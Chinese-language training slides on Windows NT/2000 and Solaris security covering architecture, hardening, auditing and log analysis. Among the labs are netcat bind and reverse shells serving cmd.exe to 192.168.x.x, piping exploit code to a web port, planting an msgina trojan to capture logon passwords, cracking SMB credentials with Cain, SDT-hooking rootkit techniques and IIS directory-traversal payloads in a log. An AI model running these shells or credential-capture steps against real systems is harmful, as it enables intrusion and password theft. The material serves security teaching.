操作系統(tǒng)安全技術(shù)

課程目的了解win2K系統(tǒng)的設(shè)計(jì)原理了解Win2K的安全特性能夠?qū)in2K系統(tǒng)進(jìn)行安全配置授課方式：講解、演示、學(xué)員實(shí)際操作中國(guó)科學(xué)院計(jì)算技術(shù)研究所教育中心趙鳳偉制作了解日常選擇的安裝分區(qū)是什么？是否關(guān)默認(rèn)服務(wù)是否采用默認(rèn)安裝對(duì)win2K是否配置過(guò)本地安全策略為什么要介紹windowsNT安全WindowsNT體系構(gòu)架WindowsNT安全基礎(chǔ)WindowsNT日常安全配置WindowsNT的審計(jì)分析為什么要介紹windowsNT的安全系統(tǒng)安全評(píng)測(cè)標(biāo)準(zhǔn)系統(tǒng)面臨很多威脅黑客攻擊手段系統(tǒng)漏洞導(dǎo)致的損失系統(tǒng)安全評(píng)測(cè)標(biāo)準(zhǔn)1985年，美國(guó)國(guó)防部公布《可信計(jì)算機(jī)系統(tǒng)評(píng)估準(zhǔn)則》（TCSEC）即桔皮書(shū)

TCSEC安全等級(jí)

安全級(jí)別描述D最低的級(jí)別。如MS-DOS計(jì)算機(jī)，沒(méi)有安全性可言C1靈活的安全保護(hù)。系統(tǒng)不需要區(qū)分用戶(hù)?？商峁└镜脑L問(wèn)控制。C2靈活的訪問(wèn)安全性。系統(tǒng)不僅要識(shí)別用戶(hù)還要考慮唯一性。系統(tǒng)級(jí)的保護(hù)主要存在于資源、數(shù)據(jù)、文件和操作上。NT屬于C2級(jí)的系統(tǒng)B1標(biāo)記安全保護(hù)。系統(tǒng)提供更多的保護(hù)措施包括各式的安全級(jí)別。如AT＆T的SYSTEMV和UNIXwithMLS以及IBMMVS/ESAB2結(jié)構(gòu)化保護(hù)。支持硬件保護(hù)。內(nèi)容區(qū)被虛擬分割并嚴(yán)格保護(hù)。如TrustedXENIXandHoneywellMULTICSB3安全域。提出數(shù)據(jù)隱藏和分層，阻止層之間的交互。如HoneywellXTS-200A校驗(yàn)級(jí)設(shè)計(jì)。需要嚴(yán)格的準(zhǔn)確的證明系統(tǒng)不會(huì)被危害，而且提供所有低級(jí)別的因素。如HoneywellSCOMP基于C2級(jí)標(biāo)準(zhǔn)的安全組件 靈活的訪問(wèn)控制WindowsNT支持C2級(jí)標(biāo)準(zhǔn)要求的靈活訪問(wèn)控制。要求包括允許對(duì)象的屬主能夠完全控制誰(shuí)可以訪問(wèn)這個(gè)對(duì)象及什么樣的訪問(wèn)權(quán)限。 對(duì)象再利用WindowsNT很明確地阻止所有的應(yīng)用程序不可訪問(wèn)被另一應(yīng)用程序使用所占用資源內(nèi)的信息（比如內(nèi)存或磁盤(pán)）。這種安全面貌是NT沒(méi)有能力恢復(fù)已在磁盤(pán)上刪除的文件的主要原因。 強(qiáng)制登陸與WindowsforWorkgroups、Windows95和98不同，WindowsNT用戶(hù)在能訪問(wèn)任何資源前必須通過(guò)登陸來(lái)驗(yàn)證他們的身份。這也是另一個(gè)原因缺乏這種強(qiáng)制登陸的NT要想達(dá)到以前的C2級(jí)的標(biāo)準(zhǔn)就必須禁止網(wǎng)絡(luò)功能。 審計(jì)因?yàn)閃indowsNT采用單獨(dú)地機(jī)制來(lái)控制對(duì)任何資源的訪問(wèn)，所以這種機(jī)制可以集中地記錄下所有的訪問(wèn)活動(dòng)。 控制對(duì)象的訪問(wèn)WindowsNT不允許直接訪問(wèn)系統(tǒng)里的資源，這種不許直接訪問(wèn)是允許訪問(wèn)控制的關(guān)鍵。在允許訪問(wèn)之前，用戶(hù)或應(yīng)用程序的權(quán)限首先被驗(yàn)證被攻擊的前幾種操作系統(tǒng)MicrosoftWindows31663000UNIX22544605CISCOIOS7821832被攻擊最多的通用WEB服務(wù)器被攻擊的產(chǎn)品占有用戶(hù)的百分比被攻擊的次數(shù)MicrosoftIIS41.0617797201ApacheGroupApache10.6212602NetscapeEnterpriseServer9.074892IplanetE-commerceSolution0.13124造成的損失2003-8-15全球受沖擊波里蠕蟲(chóng)感染的機(jī)器超過(guò)34萬(wàn)臺(tái)。8月1日下午微軟公司網(wǎng)站被黑，一個(gè)多小時(shí)無(wú)法訪問(wèn)。為什么要介紹windowsNT安全WindowsNT體系統(tǒng)構(gòu)架WindowsNT安全基礎(chǔ)WindowsNT安全日常配置WindowsNT的審計(jì)分析WindowsNT體系統(tǒng)構(gòu)架服務(wù)管理器服務(wù)進(jìn)程系統(tǒng)支持進(jìn)程本地安全驗(yàn)證服務(wù)Windows登錄會(huì)話(huà)管理器應(yīng)用程序環(huán)境子系統(tǒng)Svchost.exeWinmgmt.exeSpoolerServices.exe任務(wù)管理器Windows瀏覽器用戶(hù)級(jí)應(yīng)用程序子系統(tǒng)動(dòng)態(tài)鏈接庫(kù)OS/2POSIXWin32系統(tǒng)服務(wù)調(diào)度進(jìn)程核心可調(diào)用接口I/O設(shè)備管理器設(shè)備、文件驅(qū)動(dòng)程序文件系統(tǒng)緩存管理器即插即用設(shè)備管理器虛擬內(nèi)存管理器進(jìn)程和線程注冊(cè)表配置管理器NTdll.dllWin32UserGDI圖形驅(qū)動(dòng)HALMicrokernel為什么要介紹windowsNT安全WindowsNT體系構(gòu)架WindowsNT安全基礎(chǔ)WindowsNT安全日常配置WindowsNT的審計(jì)分析windowsNT安全模型LogonprocessSAMUserAccountDatabaseSecurityPolicyDatabaseLSAAuditlogWin32applicationWin32subsystemSecurityReferenceMonitorUsermodeKernelmodeSecuritypolicyAuditmessageWindowsNT安全子系統(tǒng)WinlogonGINALocalSecurityAuthority(LSA)AuthenticationPackagesSecuritySupportProvidersSecurityAccountManagerNetlogonSSPI安全的要素安全帳戶(hù)管理器安全標(biāo)識(shí)符SID標(biāo)識(shí)了用戶(hù)、組和計(jì)算機(jī)的唯一性，不僅僅是在某臺(tái)特定的電腦上還包括和其它計(jì)算機(jī)交互的時(shí)候。為了確保SID的唯一性，它們是綜合計(jì)算機(jī)名字、當(dāng)前時(shí)間、以及處理當(dāng)前用戶(hù)模式線程所花費(fèi)CPU的時(shí)間所建立起來(lái)的。S-1-5-16349933112989372637-500安全訪問(wèn)令牌安全描述符訪問(wèn)控制列表進(jìn)程地址空間系統(tǒng)地址空間線程線程線程進(jìn)程和線程什么是進(jìn)程？代表了運(yùn)行程序的一個(gè)實(shí)例每一個(gè)進(jìn)程有一個(gè)私有的內(nèi)存地址空間什么是線程？進(jìn)程內(nèi)的一個(gè)執(zhí)行上下文進(jìn)程內(nèi)的所有線程共享相同的進(jìn)程地址空間每一個(gè)進(jìn)程啟動(dòng)時(shí)帶有一個(gè)線程運(yùn)行程序的“主”函數(shù)可以在同一個(gè)進(jìn)程中創(chuàng)建其他的線程可以創(chuàng)建額外的進(jìn)程系統(tǒng)進(jìn)程基本的系統(tǒng)進(jìn)程smss.exeSessionManagercsrss.exe

子系統(tǒng)服務(wù)器進(jìn)程winlogon.exe

管理用戶(hù)登錄services.exe

包含很多系統(tǒng)服務(wù)lsass.exe

管理IP安全策略以及啟動(dòng)ISAKMP/Oakley(IKE)和IP安全驅(qū)動(dòng)程序。(系統(tǒng)服務(wù))產(chǎn)生會(huì)話(huà)密鑰以及授予用于交互式客戶(hù)/服務(wù)器驗(yàn)證的服務(wù)憑據(jù)(ticket)。(系統(tǒng)服務(wù))svchost.exe

包含很多系統(tǒng)服務(wù)，檢查注冊(cè)表中的位置來(lái)構(gòu)建需要

加載的服務(wù)列表SPOOLSV.EXE將文件加載到內(nèi)存中以便遲后打印。(系統(tǒng)服務(wù))explorer.exe

資源管理器internat.exe

托盤(pán)區(qū)的拼音圖標(biāo)

系統(tǒng)進(jìn)程樹(shù)smss.exe

對(duì)話(huà)管理器

第一個(gè)創(chuàng)建的進(jìn)程

引入?yún)?shù)

HKLM\System\CurrentControlSet\Control\SessionManager

裝入所需的子系統(tǒng)(csrss)，然后winlogoncsrss.exe Win32子系統(tǒng)winlogon.exe

登錄進(jìn)程：裝入services.exe和lsass.exe

顯示登錄對(duì)話(huà)框（“鍵入CTRL+ALT+DEL，登錄）當(dāng)有人登入，運(yùn)行在HKLM\Software\Microsoft\WindowsNT\WinLogon\Userinit

中的進(jìn)程（通常只是userinit.exe)services.exe服務(wù)控制器：也是幾項(xiàng)服務(wù)的出發(fā)點(diǎn)Svchost.exe

服務(wù)的開(kāi)始進(jìn)程不是services.exe的一部分

(由HKLM\System\CurrentControlSet\Services驅(qū)動(dòng))lsass.exe

本地安全驗(yàn)證服務(wù)器（打開(kāi)SAM）userinit.exe

登陸之后啟動(dòng)。啟動(dòng)外殼（通常是Explorer.exe—見(jiàn)

HKLM\Software\Microsoft\

WindowsNT\CurrentVersion\WinLogon\Shell)

裝入配置文件，恢復(fù)驅(qū)動(dòng)器標(biāo)識(shí)符映象，然后退出（因此，瀏覽器單獨(dú)顯示）

explorer.exe

和它的孩子是所有交互式應(yīng)用的創(chuàng)建者

附加的系統(tǒng)進(jìn)程?mstask.exe

允許程序在指定時(shí)間運(yùn)行。(系統(tǒng)服務(wù))?regsvc.exe

regsvc.exe

允許遠(yuǎn)程注冊(cè)表操作。(系統(tǒng)服務(wù))?winmgmt.exe

提供系統(tǒng)管理信息(系統(tǒng)服務(wù))。?inetinfo.exe

通過(guò)Internet信息服務(wù)的管理單元提供信息服務(wù)連接和管理。(系統(tǒng)服務(wù))?tlntsvr.exe

允許遠(yuǎn)程用戶(hù)登錄到系統(tǒng)并且使用命令行運(yùn)行控制臺(tái)。(系統(tǒng)服務(wù))?termsrv.exe

提供多會(huì)話(huà)環(huán)境允許客戶(hù)端設(shè)備訪問(wèn)虛擬的Windows2000Professional桌面會(huì)話(huà)以及運(yùn)行在服務(wù)器上的桌面會(huì)話(huà)基于Windows的程序。(系統(tǒng)服務(wù))?dns.exe

應(yīng)答對(duì)域名系統(tǒng)(DNS)名稱(chēng)的查詢(xún)和更新請(qǐng)求。(系統(tǒng)服務(wù))試驗(yàn)（一）用ntsd

結(jié)束正常無(wú)法結(jié)束的進(jìn)程N(yùn)tsd–cq–ppid試驗(yàn)（二）使用listdlls

分析winlogon進(jìn)程模塊信息配置devel5插入winlogon

同時(shí)測(cè)試結(jié)果用listdlls

查看winlogon是否多了wshtcpip.dll用fc命令比較兩次不用輸出結(jié)果Unlocker

強(qiáng)制刪除木馬文件Ftype

修復(fù)系統(tǒng)關(guān)聯(lián)文件試驗(yàn)（三）使用listdlls

分析winlogon進(jìn)程模塊信息植入msgina木馬用listdlls

查看winlogon的gina

是否正常查看被劫持的登陸密碼Ssdt

木馬分析Win32KernelRootkitsmodifythebehaviourofthesystembyKernelNativeAPIhooking.ThistechniqueistypicallyimplementedbymodifyingtheServiceTableentriesintheServiceDescriptorTable(SDT).Suchmodificationensuresthatareplacement(hook)functioninstalledbyarootkitiscalledpriortotheoriginalnativeAPI.ThereplacementfunctionusuallycallstheoriginalnativeAPIandmodifiestheoutputbeforereturningtheresultstotheuser-spaceprogram.Thistechniqueallowskernelrootkitstohidefiles,processes,andtopreventprocesstermination在user-space和systemservice之間是通過(guò)相應(yīng)的dllsexportapi實(shí)現(xiàn)的例1writedatatoanopenfile

由kernel32.dllwritefile

api

wirtefile

api在內(nèi)核層由zwwritefilenativeapithatisexportedbyntdll.dll

在內(nèi)核層通過(guò)中斷技術(shù)實(shí)現(xiàn)zwwritefile1-MOVEAX,0ED2-LEAEDX,DWORDPTRSS:[ESP+4]3-INT2E4-RETN24注：0EDistheservicenumberofthezwwritefile

ItwillbeusedtooffsetintotheServiceTable(SystemServiceDispatchTable)inkernel-spacetolocatetheaddressofthefunctionthatimplementsthewritefileservice

ServiceDescriptorTabletypedef

struct

ServiceDescriptorTable{ SDEServiceDescriptor[4];}SDT;typedef

struct

ServiceDescriptorEntry{PDWORDServiceTable;PDWORDCounterTableBase;DWORDServiceLimit;PBYTEArgumentTable;}SDE;ServiceTable

的值就是指向zwwritefile

whichcontainstheactualcodetowritetofilesProcessHidingbyHookingZwQuerySystemInformation

UseruseToolHelpAPIstoobtainalistofallrunningprocessesToolhepAPIcallZWQUERYSYSTEMINFORMATIONexportedbyntdll.dllinkernelmodeHackermodifythefunctionpointerinservicetable(ZWQUERYSYSTEMINFORMATION)toareplacementfunctionThereplacementfunctionfirstcallstheoriginalZwQuerySystemInformationAPItoobtainanarraycontaininginformationofallrunningprocess.Thereturnedarrayisthenmodifiedtoremovetheentrycontainingtheprocesstobehidden.Finally,themodifiedresultisreturnedtotheuser-spaceprogram.Thiseffectivelypreventstheuser-spaceprogramfrom"seeing"thehiddenprocess.sdtrestoreC:\>sdtrestoreSDTrestoreVersion0.1Proof-of-ConceptbySIG^2G-TEC(.sg)KeServiceDescriptorTable8046DFA0KeServiceDecriptorTable.ServiceTable804742B8KeServiceDescriptorTable.ServiceLimit248ZwAllocateVirtualMemory10--[hookedbyunknownatF754CE74]--ZwCreateFile20--[hookedbyunknownatF754CA85]--ZwCreateKey23--[hookedbyunknownatF754CC5E]--ZwCreateProcess29--[hookedbyunknownatF754CDB7]--ZwDeleteFile34--[hookedbyunknownatF754C80C]--ZwGetTickCount4C--[hookedbyunknownatF754CE27]--ZwLoadDriver55--[hookedbyunknownatF754CBF2]--ZwQueryDirectoryFile7D--[hookedbyunknownatF754C6E8]--ZwQuerySystemInformation97--[hookedbyunknownatF754C623]--ZwSetInformationFileC2--[hookedbyunknownatF754C8A8]--NumberofServiceTableentrieshooked=10WARNING:THISISEXPERIMENTALCODE.FIXINGTHESDTMAYHAVEGRAVECONSEQUENCES,SUCHASSYSTEMCRASH,DATALOSSORSYSTEMCORRUPTION.PROCEEDATYOUROWNRISK.YOUHAVEBEENWARNED.FixSDTEntries(Y/N)?:y[+]PatchedSDTentry10to804A257F[+]PatchedSDTentry20to80497EF9[+]PatchedSDTentry23to804B2483[+]PatchedSDTentry29to804A9212[+]PatchedSDTentry34to804D0584[+]PatchedSDTentry4Cto80463FF2[+]PatchedSDTentry55to8052DC72[+]PatchedSDTentry7Dto80498541[+]PatchedSDTentry97to80493B5B[+]PatchedSDTentryC2to80498C08試驗(yàn)1iceswordtoviewsdt

2usesdtrestoretorestorethesdtWin2K服務(wù)基礎(chǔ)TCP/IP端口與服務(wù)NetBios協(xié)議RPC服務(wù)公共互連網(wǎng)絡(luò)文件系統(tǒng)（CIFS）練習(xí)：1、查看端口與服務(wù)對(duì)應(yīng)文件2、查看默認(rèn)開(kāi)放端口TCP/IP端口與服務(wù)nc-nvv192.168.x.x80連到192.168.x.x的TCP80端口nc-l-p80監(jiān)聽(tīng)本機(jī)的TCP80端口nc-l-p5354-t-ec:\winnt\system32\cmd.exe遠(yuǎn)程主機(jī)端口與shell的綁定nc-t-ec:\winnt\system32\cmd.exe192.168.x.x5354綁定REMOTE主機(jī)的CMDSHELL并反向連接到192.168.x.x的TCP5354端口nc-nvv192.168.x.x80<c:\exploit.txt輸送溢出代碼到遠(yuǎn)程主機(jī)的80端口Smb與CifsSMB一種客戶(hù)機(jī)/服務(wù)器、請(qǐng)求/響應(yīng)協(xié)議。通過(guò)SMB協(xié)議，客戶(hù)端應(yīng)用程序可以在各種網(wǎng)絡(luò)環(huán)境下讀、寫(xiě)服務(wù)器上的文件，以及對(duì)服務(wù)器程序提出服務(wù)請(qǐng)求。此外通過(guò)SMB協(xié)議，應(yīng)用程序可以訪問(wèn)遠(yuǎn)程服務(wù)器端的文件、以及打印機(jī)、郵件槽（mailslot）、命名管道（namedpipe）等資源Smb協(xié)議MicrosoftnetworkLanmanagerNtlmNtlmv2試驗(yàn)1通過(guò)網(wǎng)上鄰居共享訪問(wèn)一個(gè)主機(jī)用cain截獲smb通訊Sendtocracker.破解用戶(hù)名與密碼試驗(yàn)2用redbutton測(cè)試smb通訊的安全性Keylogger

木馬為什么要介紹windowsNT安全WindowsNT體系構(gòu)架WindowsNT安全基礎(chǔ)WindowsNT日常安全配置WindowsNT的審計(jì)分析Win2K服務(wù)win2K日常安全配置基本安裝配置要點(diǎn)帳號(hào)和口令安全管理文件夾訪問(wèn)控制權(quán)限本地安全策略注冊(cè)表中的安全配置其它安全配置日常異常檢測(cè)和日常維護(hù)帳號(hào)和口令安全SAMSyskey帳號(hào)和口令策略帳號(hào)和口令策略***在賬戶(hù)策略->密碼策略中設(shè)定：

密碼復(fù)雜性要求啟用

密碼長(zhǎng)度最小值個(gè)人機(jī)8位，服務(wù)器10位以上

強(qiáng)制密碼歷史5次

最長(zhǎng)存留期30天

***在賬戶(hù)策略->賬戶(hù)鎖定策略中設(shè)定：

賬戶(hù)鎖定3次錯(cuò)誤登錄

鎖定時(shí)間20分鐘

復(fù)位鎖定計(jì)數(shù)20分鐘

練習(xí)帳號(hào)和口令安全更改超級(jí)管理帳戶(hù)名稱(chēng)取消guest帳號(hào)禁止某些帳號(hào)從本地或遠(yuǎn)程登錄新建一名為administrator的普通帳號(hào)為用戶(hù)合理地分配權(quán)限練習(xí)用戶(hù)權(quán)限Administrators組Users組PowerUsers組BackupOperators組win2K日常安全配置基本安裝配置要點(diǎn)帳號(hào)和口令安全管理文件夾訪問(wèn)控制權(quán)限本地安全策略注冊(cè)表中的安全配置其它安全配置日常異常檢測(cè)和日常維護(hù)文件系統(tǒng)安全Windows2000支持NTFS文件系統(tǒng)、文件分配表(FAT)和FAT32。NTFSFATFAT32運(yùn)行Windows2000的計(jì)算機(jī)可以訪問(wèn)NTFS分區(qū)上的文件。運(yùn)行帶有ServicePack4或更高版本的WindowsNT4.0計(jì)算機(jī)可能可以訪問(wèn)某些文件。其他操作系統(tǒng)則無(wú)法訪問(wèn)。可以通過(guò)MS-DOS、所有版本的Windows、WindowsNT、Windows2000和OS/2訪問(wèn)。只能通過(guò)Windows95OSR2、Windows98和Windows2000訪問(wèn)。NTFS與FAT分區(qū)權(quán)限FAT32NTFSNTFS分區(qū)特點(diǎn)特殊權(quán)限所有者控制繼承性移動(dòng)/復(fù)制影響共享權(quán)限磁盤(pán)配額文件權(quán)限權(quán)限控制原則和特點(diǎn)1>權(quán)限是累計(jì)2>拒絕的權(quán)限要比允許的權(quán)限高3>文件權(quán)限比文件夾權(quán)限高4>利用用戶(hù)組來(lái)進(jìn)行權(quán)限控制5>權(quán)限的最小化原則win2K日常安全配置基本安裝配置要點(diǎn)帳號(hào)和口令安全管理文件夾訪問(wèn)控制權(quán)限本地安全策略注冊(cè)表中的安全配置其它安全配置日常異常檢測(cè)和日常維護(hù)本地安全策略--本地策略審核策略：決定記錄在計(jì)算機(jī)（成功/失敗的嘗試）的安全日志上的安全事件。用戶(hù)權(quán)利分配：決定在計(jì)算機(jī)上有登錄/任務(wù)特權(quán)的用戶(hù)或組。安全選項(xiàng)：?jiǎn)⒂没蚪糜?jì)算機(jī)的安全設(shè)置，例如數(shù)據(jù)的數(shù)字信號(hào)、administrator和guest的帳號(hào)名、軟驅(qū)和光盤(pán)的訪問(wèn)、驅(qū)動(dòng)程序的安裝以及登錄提示。win2K日常安全配置基本安裝配置要點(diǎn)帳號(hào)和口令安全管理文件夾訪問(wèn)控制權(quán)限本地安全策略注冊(cè)表中的安全配置其它安全配置日常異常檢測(cè)和日常維護(hù)Regedit與Regedt32的區(qū)別regeditregedt32使用較新的Windows9x/me用戶(hù)界面使用較早的windows3.1用戶(hù)界面可搜索：鍵名、值名、值內(nèi)容只能搜索鍵名可以搜索并編輯遠(yuǎn)程注冊(cè)表可以搜索并編輯遠(yuǎn)程注冊(cè)表在一個(gè)窗口中顯示整個(gè)注冊(cè)表對(duì)每一控制項(xiàng)顯示各自的窗口可以導(dǎo)出、導(dǎo)入文本文件可以導(dǎo)出但不能導(dǎo)入文本文件不能導(dǎo)出或?qū)攵M(jìn)制文件可以導(dǎo)出并導(dǎo)入二進(jìn)制文件不能提供“只讀”模式提供“只讀”模式，但不作為缺省形式不提供安全特性支持完整的WindowsNT/2000訪問(wèn)控制和審計(jì)存放在winnt文件夾里存放在winnt\system32文件里只完全支持Windows9x/me注冊(cè)表數(shù)據(jù)類(lèi)型（字符串、二進(jìn)制、DWORD）支持全部WindowsNT/2000注冊(cè)表數(shù)據(jù)類(lèi)型/字符串、二進(jìn)制、DWORD、多字符串、可擴(kuò)展字符串、資源描述刪除默認(rèn)網(wǎng)絡(luò)共享服務(wù)器:Key:HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parametersName:AutoShareServerType:DWORDValue:0工作站：Key:HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parametersName:AutoShareWksType:DWORDValue:0練習(xí)1、去除默認(rèn)共享2、刪除IE啟動(dòng)主頁(yè)3、刪除IE的主頁(yè)修改限制注冊(cè)表權(quán)限試驗(yàn)1通過(guò)regedt32修改run的訪問(wèn)權(quán)限2在run下添加或修改響應(yīng)鍵值，看看結(jié)果安全模版與分析工具默認(rèn)工作站(basicwk.inf)默認(rèn)服務(wù)器(basicsv.inf)默認(rèn)域控制器(basicdc.inf)兼容工作站或服務(wù)器(compatws.inf)安全工作站或服務(wù)器(securews.inf)高度安全工作站或服務(wù)器(hisecws.inf)專(zhuān)用域控制器(dedicadc.inf)安全域控制器(securedc.inf)高度安全域控制器(hisecdc.inf)

練習(xí)：做一個(gè)適合普通辦公用機(jī)的安全模版，將其導(dǎo)出。模板配置試驗(yàn)通過(guò)mmc打開(kāi)安全模板和安全配置分析修改一個(gè)模板如securews

另存為一新模板在安全配置與分析打開(kāi)一數(shù)據(jù)庫(kù)，輸入名字，導(dǎo)入新建模板查看系統(tǒng)配置win2K日常安全配置基本安裝配置要點(diǎn)帳號(hào)和口令安全管理文件夾訪問(wèn)控制權(quán)限本地安全策略注冊(cè)表中的安全配置其它安全配置日常異常檢測(cè)和日常維護(hù)其它安全配置組策略EFS加密文件系統(tǒng)IIS安全I(xiàn)E安全EFS加密文件系統(tǒng)特性：1、采用單一密鑰技術(shù)2、核心文件加密技術(shù)僅用于NTFS，使用戶(hù)在本地計(jì)算機(jī)上安全存儲(chǔ)數(shù)據(jù)3、加密用戶(hù)使用透明，其他用戶(hù)被拒4、不能加密壓縮的和系統(tǒng)文件，加密后不能被共享、能被刪除建議加密文件夾，不要加密單獨(dú)的文件EFS恢復(fù)代理故障恢復(fù)代理就是獲得授權(quán)解密由其他用戶(hù)加密的數(shù)據(jù)的管理員必須進(jìn)行數(shù)據(jù)恢復(fù)時(shí)，恢復(fù)代理可以從安全的存儲(chǔ)位置獲得數(shù)據(jù)恢復(fù)證書(shū)導(dǎo)入系統(tǒng)。默認(rèn)的超級(jí)管理員就是恢復(fù)代理使用條件：當(dāng)加密密鑰丟失練習(xí)：1、用一個(gè)名為test的普通用戶(hù)將文件aa.txt加密2、使用一個(gè)名為張三的在管理員組帳號(hào)打開(kāi)3、使用系統(tǒng)默認(rèn)的超級(jí)管理員打開(kāi)IIS的安全配置

安裝IIS注意事項(xiàng)

Web站點(diǎn)主目錄目錄安全性練習(xí)SSL安全機(jī)制

SSL（加密套接字協(xié)議層）位于HTTP層和TCP層之間，建立用戶(hù)與服務(wù)器之間的加密通信，確保所傳遞信息的安全性。使用SSL安全機(jī)制時(shí)，首先客戶(hù)端與服務(wù)器建立連接，服務(wù)器把它的數(shù)字證書(shū)與公共密鑰一并發(fā)送給客戶(hù)端，客戶(hù)端隨機(jī)生成會(huì)話(huà)密鑰，用從服務(wù)器得到的公共密鑰對(duì)會(huì)話(huà)密鑰進(jìn)行加密，并把會(huì)話(huà)密鑰在網(wǎng)絡(luò)上傳遞給服務(wù)器，而會(huì)話(huà)密鑰只有在服務(wù)器端用私人密鑰才能解密，這樣，客戶(hù)端和服務(wù)器端就建立了一個(gè)唯一的安全通道。安裝IIS注意事項(xiàng)選擇安裝組件INTERNET服務(wù)管理器INTERNET服務(wù)管理器（HTML）WORLDWIDEWEB服務(wù)器公用文件文檔文件傳輸（FTP）服務(wù)器避免安裝在主域控制器上刪除inetpub下的scripts目錄IIS工具ToolIISLockTool具有以下功能和特點(diǎn)：?幫助管理員設(shè)置

IIS安全性；?此工具可以在4IIS4和

IIS5上使用；?幫助管理員去掉對(duì)本網(wǎng)站不必要的一些服務(wù)，使

IIS在滿(mǎn)足本網(wǎng)站需求的情況下運(yùn)行最少的服務(wù)下載地址?http:///default.aspx?scid=kb;en-us;309508IE的安全設(shè)置常規(guī)安全內(nèi)容高級(jí)win2K日常安全配置基本安裝配置要點(diǎn)帳號(hào)和口令安全管理文件夾訪問(wèn)控制權(quán)限本地安全策略注冊(cè)表中的安全配置其它安全配置日常異常檢測(cè)和日常維護(hù)日常異常檢測(cè)異常端口檢測(cè)異常進(jìn)程檢測(cè)異常啟動(dòng)項(xiàng)檢測(cè)異常程序檢測(cè)練習(xí)：1、異常端口檢測(cè)2、檢測(cè)異常啟動(dòng)程序和進(jìn)程MBSAMicrosoftBaselineSecurityAnalyzer從MBSA主頁(yè)下載MBSA：/technet/security/tools/mbsahome.mspx

部署SUShttp:///fwlink/?LinkId=6930

日常維護(hù)--備份和還原數(shù)據(jù)將文件備份到文件或磁帶備份“系統(tǒng)狀態(tài)”數(shù)據(jù)使用備份向?qū)浞菸募?jì)劃備份將文件備份到MicrosoftExchange為什么要介紹windowsNT安全WindowsNT體系構(gòu)架WindowsNT安全基礎(chǔ)WindowsNT日常安全配置WindowsNT的審計(jì)分析安全審核與日志

訪問(wèn)文件夾的審核審核策略安全事件查看并分析審計(jì)成功：可以確定用戶(hù)或服務(wù)獲得訪問(wèn)指定文件、打印機(jī)或其他對(duì)象的頻率審計(jì)失敗：警告那些可能發(fā)生的安全泄漏windowsNT日志系統(tǒng)日志

跟蹤各種各樣的系統(tǒng)事件，比如跟蹤系統(tǒng)啟動(dòng)過(guò)程中的事件或者硬件和控制器的故障。

應(yīng)用程序日志

跟蹤應(yīng)用程序關(guān)聯(lián)的事件，比如應(yīng)用程序產(chǎn)生的象裝載DLL（動(dòng)態(tài)鏈接庫(kù)）失敗的信息將出現(xiàn)在日志中。安全日志

跟蹤事件如登錄上網(wǎng)、下網(wǎng)、改變?cè)L問(wèn)權(quán)限以及系統(tǒng)啟動(dòng)和關(guān)閉。注意：安全日志的默認(rèn)狀態(tài)是關(guān)閉的。日志Internet信息服務(wù)

FTP日志默認(rèn)位置：%systemroot%/system32logfiles/msftpsvc1默認(rèn)每天一個(gè)日志Internet信息服務(wù)WWW日志默認(rèn)位置：：%systemroot%/system32/logfiles/w3svc1，默認(rèn)每天一個(gè)日志FTP日志和WWW日志文件名通常為ex（年份）（月份）（日期），例如ex001023就是2000年10月23日產(chǎn)生的日志，用記事本就可直接打開(kāi)Scheduler服務(wù)日志默認(rèn)位置：%systemroot%/schedlgu.txt日志分析FTP日志分析，如下例：#Software:MicrosoftInternetInformationServices5.0（微軟IIS5.0）#Version:1.0（版本1.0）#Date:2000102303:11:55（服務(wù)啟動(dòng)時(shí)間日期）03:11:55[1]USERadministator-331（IP地址為

用戶(hù)名為administator

試圖登錄）03:11:58[1]PASS-530（登錄失敗）03:12:04[1]USERnt-331（

IP地址為

用戶(hù)名為

nt的用戶(hù)試圖登錄）03:12:06[1]PASS-530（登錄失?。?3:12:32[1]USERadministrator-331（（

IP地址為

用戶(hù)名為administrator試圖登錄）03:12:34[1]PASS230（登錄成功）（登錄成功）03:12:41[1]MKDnt550（新建目錄失敗）03:12:45[1]QUIT550（退出FTP程序）日志分析http日志#Software:MicrosoftInternetInformationServices5.0#Version:1.0#Date:2003-08-1105:30:32#Fields:datetimec-ip

cs-usernames-ips-portcs-methodcs-uri-stem

cs-uri-querysc-statuscs(User-Agent)2003-08-1105:30:3243-4380GET/scripts/..%5c..%5cwinnt/system32/cmd.exe/c+dir+c:\200Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)2003-08-1107:24:0143-4380GET/scripts/..%5c..%5cwinnt/system32/cmd.exe/c+copy%20c:\winnt\system32\cmd.exe%20venus.exe502Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)2003-08-2003:00:3543-4380GET/<Rejected-By-UrlScan>~/scripts/..%c1%af../winnt/system32/cmd.exe404-總結(jié)為什么要介紹windowsNT安全WindowsNT體系構(gòu)架WindowsNT安全基礎(chǔ)WindowsNT日常安全配置WindowsNT的審計(jì)分析課程目的掌握Solaris系統(tǒng)的安全配置掌握Solaris系統(tǒng)的異常分析及審計(jì)授課方式：講解、演示、學(xué)員上機(jī)操作

本課程操作、實(shí)驗(yàn)環(huán)境：Solaris_9_x86Solaris系統(tǒng)安全Solaris系統(tǒng)安全配置Solaris系統(tǒng)審計(jì)分析Solaris系統(tǒng)安全配置Solaris系統(tǒng)基本安裝配置帳號(hào)和口令安全文件系統(tǒng)安全其它安全配置網(wǎng)絡(luò)服務(wù)安全異常檢測(cè)和維護(hù)Solaris系統(tǒng)安裝不安裝多余組件停止不必要的服務(wù)打最新的補(bǔ)丁設(shè)置aset關(guān)閉無(wú)用端口編輯/etc/inet/inetd.conf文件，注釋調(diào)無(wú)用的端口。（保留Telnet、Xwindows端口）參照/etc/inet/services文件中的端口。查看服務(wù)對(duì)應(yīng)的端口Solaris基本配置關(guān)閉無(wú)用端口/etc/rc3.dS34dhcp

S76snmpdx

S80mipagent

S15nfs.server

S50apache

S77dmi將大寫(xiě)的S改為小寫(xiě)xSolaris基本配置/etc/rc2.d

S70uucp

S71ldap.client

S72autoinstall

S73cachefs.daemon

S73nfs.client

S74autofs

S74xntpd

S80lp

S94Wnn6

將大寫(xiě)的S改為小寫(xiě)x如果想關(guān)閉Xwindows將S71rpc、S99dtlogin

改名Solaris基本配置Solaris補(bǔ)丁安裝Showrev

－p顯示安裝補(bǔ)丁版本信息Solaris補(bǔ)丁分類(lèi)Point

Cluster

